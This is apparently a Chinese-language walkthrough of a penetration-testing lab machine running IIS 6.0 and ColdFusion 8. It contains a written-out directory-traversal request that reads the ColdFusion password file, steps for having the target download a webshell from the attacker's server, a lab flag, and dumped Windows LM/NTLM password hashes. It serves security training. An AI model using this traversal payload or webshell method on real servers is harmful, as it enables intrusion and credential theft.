端口扫描
使用nmap 进行常规端口扫描,发现仅开了80端口。
web页面是
iis 6.0的默认页面,也没开webdav(也可以使用nmap --script http-iis-webdav-vuln -p80 10.11.1.10 -Pn 进行检测)。
使用dirb 扫描目录发现存在
ColdFusion控制台 http://10.11.1.10/CFide/administrator/
使用ColdFusion 8 的目录穿越漏洞进行读取密码文件
GET /CFide/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en HTTP/1.1
Host: 10.11.1.10
密码哈希:
AAFDC23870ECBCD3D557B6423A8982134E17927E解密为:pass123
可以使用计划任务进行上传文件
使用 https://github.com/toddfh/webshell.cfm 中的webshell
其中url为攻击机器启动的web,目的是远程下载cfm webshell文件到目标机器中。
执行后,直接访问 http://10.11.1.10/CFide/cmdshell.cfm 即可
获取
proof.txt文件,内容为:a416a831fddf36aa8c01ba0674ca7bf8 
收集信息
| 账号 | 哈希 | 密码 |
| Administrator | 6d3448b44472bc42b065e6fcd94d7922 | |
| SUPPORT_388945a0 | 80443829564440d434ee643af4c8adc0 | |
| IUSR_WINDOWS2003 | Hash LM : 24c5497f278eec15bb0a3094ea72abf5 Hash NTLM: 9ddc6832f1a687124167d4a10d5eec98 | |
| IWAM_WINDOWS2003 | Hash LM : a42ccf3c5467a7a62cc68726d61acda6 Hash NTLM: 1d1d5e9df3f019b92d45f0bd827028ae |